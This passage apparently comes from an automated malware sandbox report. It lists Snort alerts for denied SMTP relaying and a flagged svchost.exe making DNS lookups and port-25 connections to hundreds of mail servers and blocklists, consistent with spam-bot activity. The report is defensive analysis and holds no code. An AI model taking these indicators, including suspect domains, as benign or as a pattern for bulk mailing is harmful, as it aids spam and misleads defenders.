Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 52.47.149.86:25 -> 192.168.2.4:50055
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50067
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50107
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.22.161:25 -> 192.168.2.4:50150
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50142
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50157
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 108.177.119.26:25 -> 192.168.2.4:50164
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50176
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 125.209.238.137:25 -> 192.168.2.4:50186
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50222
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50241
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50243
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50255
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.58.161:25 -> 192.168.2.4:50271
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50270
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50280
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 77.75.76.42:25 -> 192.168.2.4:50288
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50303
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50302
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 108.177.119.26:25 -> 192.168.2.4:50312
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50321
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.4:50333
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50332
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.4:50343
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.4:50405
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50406
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50415
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50424
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50439
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50440
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.55.33:25 -> 192.168.2.4:50449
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50454
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50461
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 125.209.238.137:25 -> 192.168.2.4:50445
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50473
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50498
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50515
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50526
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50531
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.4:50545
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 125.209.238.137:25 -> 192.168.2.4:50527
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.56.161:25 -> 192.168.2.4:50549
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50558
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 125.209.238.137:25 -> 192.168.2.4:50559
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50594
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 203.36.137.234:25 -> 192.168.2.4:50596
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 203.36.137.234:25 -> 192.168.2.4:50611
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 203.36.137.234:25 -> 192.168.2.4:50610
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50609
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.97:25 -> 192.168.2.4:50622
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 203.36.137.234:25 -> 192.168.2.4:50614
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 203.36.137.234:25 -> 192.168.2.4:50624
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50625
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50647
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50664
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50665
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50674
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.161:25 -> 192.168.2.4:50707
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50706
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50717
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 74.125.200.27:25 -> 192.168.2.4:50680
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50725
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.4:50741
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50743
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50766
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50771
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.22.161:25 -> 192.168.2.4:50783
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50825
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50824
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50838
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50836
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50847
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.4:50871
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50878
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50877
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50887
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 125.209.238.137:25 -> 192.168.2.4:50855
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50889
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 51.81.57.58:25 -> 192.168.2.4:50888
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50892
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 108.177.119.26:25 -> 192.168.2.4:50891
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 74.125.200.27:25 -> 192.168.2.4:50886
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50898
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50905
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50903
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50912
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50913
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 108.177.119.26:25 -> 192.168.2.4:50910
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 74.125.200.27:25 -> 192.168.2.4:50904
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50915
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50917
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50926
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50927
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50930
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50935
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50937
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50939
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50941
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50945
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50953
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.4:50959
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.27:25 -> 192.168.2.4:50956
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 77.75.76.42:25 -> 192.168.2.4:50967
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 64.29.151.236:25 -> 192.168.2.4:50980

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 213.120.69.2 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mxa-00262c01.gslb.pphosted.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: wi.rr.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: rediffmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: energyjustice.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: controlling.cz
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx-01-us-east-2.prod.hydra.sophos.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.cbl.abuseat.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: vallipartners.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 209.222.82.255 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: btinternet.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 142.250.150.27 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: o2.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.zen.spamhaus.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 148.163.156.240 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 35.162.106.154 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 194019900.pamx1.hotmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: fastpool.xyz
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 96.114.157.80 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: anntaylor.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mail.webmailious.top
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gmai.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbgaskill.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cbs.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx01.mail.icloud.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 211.231.108.176 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.comcast.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.162.196.70 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbesing.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: lorentzmeats.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 212.27.48.6 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: alt1.gmail-smtp-in.l.google.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cluster1.us.messagelabs.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: freenet.de
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.8.33 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.privateemail.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.222.135.150 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 40.93.207.1 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.lycos.com.cust.b.hostedemail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: prodigy.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.in-addr.arpa
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.57.161 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.interia.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mxa-00217301.gslb.pphosted.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 62.141.42.208 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: unicauca.edu.co
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.google.co.cr
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: t-online.de
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 67.195.228.106 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx00.emig.kundenserver.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.mailchannels.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 98.136.96.93 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 66.111.4.73 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 66.111.4.74 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx4.mail.ovh.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: d123140a.ess.barracudanetworks.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbfs.id.au
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: d314473.a.ess.de.barracudanetworks.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: sydstu.catholic.edu.au
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.tlen.pl
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.244.49.115 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 87.98.164.155 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 5.61.37.41 423	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 95.216.195.92 423	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 195.4.92.218 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 67.195.228.111 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: education.nsw.gov.au
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.56.146.41 423	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.56.146.42 423	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.56.146.43 423	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 200.58.111.200 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: medtronic.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 148.163.152.155 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: smtp.yopmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: online.fr
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mta7.am0.yahoodns.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mxa-00204301.gslb.pphosted.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 125.209.238.137 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.sbl-xbl.spamhaus.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 194.25.134.8 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbgpromotions.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 208.77.151.115 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 13.94.144.32 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: alt1.aspmx.l.google.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.bl.spamcop.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.free.fr
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pgcps.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 64.98.36.4 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: lambda.uniform.thefreemail.top
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bacavalley.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 108.177.119.27 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx00.t-online.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 108.177.119.26 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: smtp-in.sfr.fr
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: minit-europe.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: netscape.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: conex.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: baccaro.eu
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dignityhealth.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: syd.catholic.edu.au
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: whiskeyiota.webmailious.top
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hughes-walker.co.uk
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hotmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.lb.btinternet.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 208.80.202.60 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: online.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hanmail.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ff-ip4-mx-vip2.prodigy.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: live.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: flash.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 217.74.65.64 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: defeatwax.ru
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mxa-003d3601.gslb.pphosted.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mhtn.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.google.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: yahoo.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.dnsbl.sorbs.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: antispam.minit-europe.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cox.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.66.33 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx01.emig.gmx.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: wp.eu
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.wp.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbgriffin.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx2.naver.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: epicgames.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cxr.mx.a.cloudfilter.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: naver.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 176.9.75.42 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 67.219.246.204 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: controlling-cz.mail.protection.outlook.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 212.227.17.5 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: emig.freenet.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: e.gsasearchengineranker.site
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx00.mail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: aol.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 148.163.152.163 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 67.195.204.80 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bacavalley.com.mx1.greymail.rcimx.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.73.137.222 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: lycos.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bellsouth.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.101.24.0 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.217.168.68 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.217.168.67 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gmx.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: email.cz
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: nam.olc.protection.outlook.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 67.195.204.79 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.65.252.97 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.powered.name
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: icloud.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: noos.fr
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbfestival.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hamstermail.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: live-com.olc.protection.outlook.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: op.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mailstream-east.mxrecord.io
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: metropharm.com.au
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mxb-00116001.gslb.pphosted.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 213.227.140.23 423	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 144.160.235.144 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: colpal.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: att.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: in1-smtp.messagingengine.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 148.163.152.7 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.56.146.188 487	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbfletcher.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 17.42.251.10 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 66.111.4.70 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: me.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 144.160.159.22 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dberney.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx4.hanmail.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.netsolmail.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: comcast.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 18.185.115.251 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx2.ik2.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.53.36 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: rocketmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.58.161 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: seznam.cz
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 198.54.122.213 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.seznam.cz
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 213.180.147.146 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx03.cloud.vadesecure.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 213.91.128.133 76	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.22.161 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.13.36 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.13.33 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 3.130.46.147 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.32.124.207 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.poczta.onet.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mail.vallipartners.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: yopmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: interia.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx-aol.mail.gm0.yahoodns.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pupa.it
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gamil.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: lowes.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mta6.am0.yahoodns.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mail.h-email.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ASPMX.L.GOOGLE.COM
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: sigaint.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 93.17.128.123 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.58.33 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.47.149.86 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 205.220.166.52 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: agilysse.fr
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 77.75.76.42 25	Jump to behavior
